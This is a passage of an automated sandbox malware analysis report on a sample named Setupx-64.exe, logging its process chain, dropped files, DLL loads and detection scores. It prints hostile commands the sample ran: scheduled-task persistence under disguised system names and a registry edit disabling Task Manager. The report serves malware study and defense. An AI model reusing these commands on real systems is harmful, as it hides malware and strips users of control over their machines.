            Source: RZctPlhC2XmeDKsE7v.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: StartMenuExperienceHost.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: RuntimeBroker.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: upfc.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: fontdrvhost.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: Setupx-64.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs Setupx-64.exe
            Source: Setupx-64.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/361@2/1
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008B6EC9 GetLastError,FormatMessageW,0_2_008B6EC9
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008C9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_008C9E1C
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Program Files (x86)\google\Update\upfc.exeJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Blockruntime.exe.logJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeMutant created: NULL
            Source: C:\Program Files (x86)\Google\Update\upfc.exeMutant created: \Sessions\1\BaseNamedObjects\Local\57c3278637fca07d7836ae950d8b7c9bb380e11f
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile created: C:\Users\user\AppData\Local\Temp\agASguiHpHJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComcontainerruntimeCrtNet\kFuzdYrWw7.bat" "
            Source: C:\Users\user\Desktop\Setupx-64.exeCommand line argument: sfxname0_2_008CD5D4
            Source: C:\Users\user\Desktop\Setupx-64.exeCommand line argument: sfxstime0_2_008CD5D4
            Source: C:\Users\user\Desktop\Setupx-64.exeCommand line argument: STARTDLG0_2_008CD5D4
            Source: Setupx-64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Setupx-64.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Setupx-64.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 51klZeUGrz.20.dr, LWnTEGBxtm.20.dr, 0jAYM3Uvrn.20.dr, Qj7HUah2xl.20.dr, WU2sWBE1JM.20.dr, xtmV5nEWex.20.dr, gsJeTUqMe0.20.dr, CWXq5WJS8M.20.dr, y8lnqSHJQK.20.dr, eoIkWXJdXO.20.dr, 1yQja4rY7w.20.dr, 3b2UTRZ5dy.20.dr, WT7igJstkg.20.dr, W7YgtMpxef.20.dr, 2ITHmEz91j.20.dr, EpJ4NgiZO4.20.dr, qIqm9CFUPT.20.dr, aF43coHGVW.20.dr, faXNkMGeYx.20.dr, YgBorfbFgZ.20.dr, PmKdAonf5R.20.dr, k0CTaMruXo.20.dr, WLX9MpST9v.20.dr, sKKCXQV5yo.20.dr, 5Kd7CI0pUz.20.dr, SvXrscynDD.20.dr, 23G0KSf3d5.20.dr, iCrsDdqGqF.20.dr, SLt9cEj2ap.20.dr, 1nGiLi1xxp.20.dr, 55v1QXHSU1.20.dr, qQy8BdXsjN.20.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Setupx-64.exeVirustotal: Detection: 63%
            Source: Setupx-64.exeReversingLabs: Detection: 66%
            Source: C:\Users\user\Desktop\Setupx-64.exeFile read: C:\Users\user\Desktop\Setupx-64.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Setupx-64.exe "C:\Users\user\Desktop\Setupx-64.exe"
            Source: C:\Users\user\Desktop\Setupx-64.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComcontainerruntimeCrtNet\kFuzdYrWw7.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ComcontainerruntimeCrtNet\Blockruntime.exe "C:\ComcontainerruntimeCrtNet\Blockruntime.exe"
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /rl HIGHEST /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /rl HIGHEST /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Recovery\fontdrvhost.exe'" /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\fontdrvhost.exe'" /rl HIGHEST /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Recovery\fontdrvhost.exe'" /rl HIGHEST /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RZctPlhC2XmeDKsE7vR" /sc MINUTE /mo 7 /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RZctPlhC2XmeDKsE7v" /sc ONLOGON /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /rl HIGHEST /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RZctPlhC2XmeDKsE7vR" /sc MINUTE /mo 8 /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /rl HIGHEST /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Program Files (x86)\Google\Update\upfc.exe "C:\Program Files (x86)\google\Update\upfc.exe"
            Source: unknownProcess created: C:\Recovery\fontdrvhost.exe C:\Recovery\fontdrvhost.exe
            Source: unknownProcess created: C:\Recovery\fontdrvhost.exe C:\Recovery\fontdrvhost.exe
            Source: unknownProcess created: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe
            Source: unknownProcess created: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            Source: C:\Users\user\Desktop\Setupx-64.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComcontainerruntimeCrtNet\kFuzdYrWw7.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ComcontainerruntimeCrtNet\Blockruntime.exe "C:\ComcontainerruntimeCrtNet\Blockruntime.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeProcess created: C:\Program Files (x86)\Google\Update\upfc.exe "C:\Program Files (x86)\google\Update\upfc.exe" Jump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: version.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: wldp.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: profapi.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: amsi.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: userenv.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: propsys.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: edputil.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: netutils.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: slc.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: sppc.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
